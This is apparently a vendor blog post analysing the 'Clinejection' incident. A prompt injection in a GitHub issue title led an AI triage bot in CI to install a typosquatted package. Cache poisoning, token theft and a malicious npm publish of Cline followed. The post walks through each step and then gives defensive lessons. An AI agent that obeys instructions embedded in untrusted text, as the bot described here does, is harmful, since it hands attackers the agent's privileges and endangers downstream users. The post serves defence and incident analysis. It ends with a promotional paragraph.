Clinejection: How a GitHub Issue Title Compromised 4,000 Developer Machines

On February 17, 2026, approximately 4,000 developers installed a compromised version of Cline, a popular AI coding assistant. The malicious package silently installed a second AI agent on their machines without consent. The entry point was not malware. It was not a zero-day. It was natural language in a GitHub issue title.
The Attack Chain
The attack, which Snyk named "Clinejection," composes five well-understood vulnerabilities into a single exploit:
Step 1: Prompt Injection
Cline had deployed an AI-powered issue triage workflow using Anthropic's claude-code-action. The workflow allowed any GitHub user to trigger it by opening an issue. The issue title was interpolated directly into the AI prompt without sanitization.
An attacker created Issue #8904 with a title containing an embedded instruction to install a package from a malicious repository.
Step 2: Arbitrary Code Execution
The AI bot interpreted the injected instruction as legitimate and ran npm install pointing to a typosquatted repository. The fork contained a preinstall script that fetched and executed a remote shell script.
Step 3: Cache Poisoning
The shell script deployed Cacheract, a GitHub Actions cache poisoning tool. It flooded the cache with junk data, triggering GitHub's LRU eviction policy and replacing legitimate entries with poisoned versions.
Step 4: Credential Theft
When Cline's nightly release workflow restored node_modules from cache, it loaded the compromised version. The workflow held NPM_RELEASE_TOKEN, VSCE_PAT (VS Code Marketplace), and OVSX_PAT (OpenVSX). All three were exfiltrated.
Step 5: Malicious Publish
Using the stolen npm token, the attacker published [email protected] with a postinstall hook that ran:
npm install -g openclaw@latest
The compromised version was live for eight hours before StepSecurity flagged it.
Why Traditional Controls Failed
This attack bypassed every standard security measure:
| Control | Why It Failed |
|---|---|
| npm audit | The postinstall script installs a "legitimate" package. No malware to detect. |
| Code review | Only package.json changed by one line. Binary was identical. |
| Provenance attestations | Cline was not using OIDC-based npm provenance at the time. |
| Permission prompts | Lifecycle scripts run during npm install without user interaction. |
The fundamental problem: developers trust Tool A, but Tool A (compromised) delegates authority to Tool B without consent.
The Botched Rotation
Security researcher Adnan Khan discovered this vulnerability chain in December 2025 and reported it on January 1, 2026. He sent multiple follow-ups over five weeks. None received a response.
When Khan publicly disclosed on February 9, Cline patched within 30 minutes. But during credential rotation, the team deleted the wrong token. The exposed token remained active for six more days, giving the actual attacker (not Khan) time to weaponize the published proof-of-concept.
Lessons for DevOps Teams
1. Treat AI Agents in CI as High-Risk
Any AI workflow that processes untrusted input (issues, PRs, comments) and has access to secrets is a target. Restrict permissions with the principle of least privilege.
# Bad: Any user can trigger the workflow
allowed_non_write_users: "*"
# Better: Restrict to maintainers
allowed_non_write_users: []
2. Never Interpolate Untrusted Input into Prompts
Sanitize all external input before passing it to AI agents:
# Vulnerable
prompt: "Triage issue: ${{ github.event.issue.title }}"
# Safer: Use a separate, sanitized variable
prompt: "Triage issue: ${SANITIZED_TITLE}"
3. Isolate Credential-Handling Workflows
Never cache node_modules or other dependencies in workflows that have access to publishing credentials. Use ephemeral, fresh environments for releases.
4. Adopt OIDC Provenance for Package Publishing
OIDC-based provenance attestations would have prevented this attack entirely. A stolen token cannot publish packages when provenance requires cryptographic attestation from a specific workflow.
# npm provenance with GitHub Actions
- name: Publish
run: npm publish --provenance
env:
NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
5. Monitor for Token Misuse
StepSecurity flagged the anomaly 14 minutes after publication. Consider automated monitoring for:
- Publishes without provenance metadata
- Publishes from unexpected IPs or at unusual times
- Changes to lifecycle scripts in package.json
6. Respond to Security Disclosures Promptly
Khan's five-week disclosure timeline with no response gave attackers time to weaponize his research. Establish SLAs for security reports (72 hours for initial response is a common standard).
The Bigger Picture
Clinejection is not just a supply chain attack. It is an agent security problem. The entry point was natural language. The first link was an AI bot interpreting untrusted text as instructions and executing them with CI privileges.
Every team deploying AI agents in CI/CD for issue triage, code review, or automated testing has this exposure. The question is whether anything evaluates what the agent does with its access before execution.
As AI coding tools become standard in development workflows, the attack surface expands. Prompt injection is no longer a theoretical concern. It is a proven supply chain attack vector.
References
- StepSecurity: Cline Supply Chain Attack Detected
- Snyk: How Clinejection Turned an AI Bot into a Supply Chain Attack
- Adnan Khan: Clinejection Technical Writeup
- Cline: Post-Mortem - Unauthorized cline CLI npm Publish
Akmatori helps SRE teams manage AI agents with observability and control. When your AI tooling becomes a target, you need visibility into what agents are doing and the ability to enforce policy. Learn more about Akmatori.
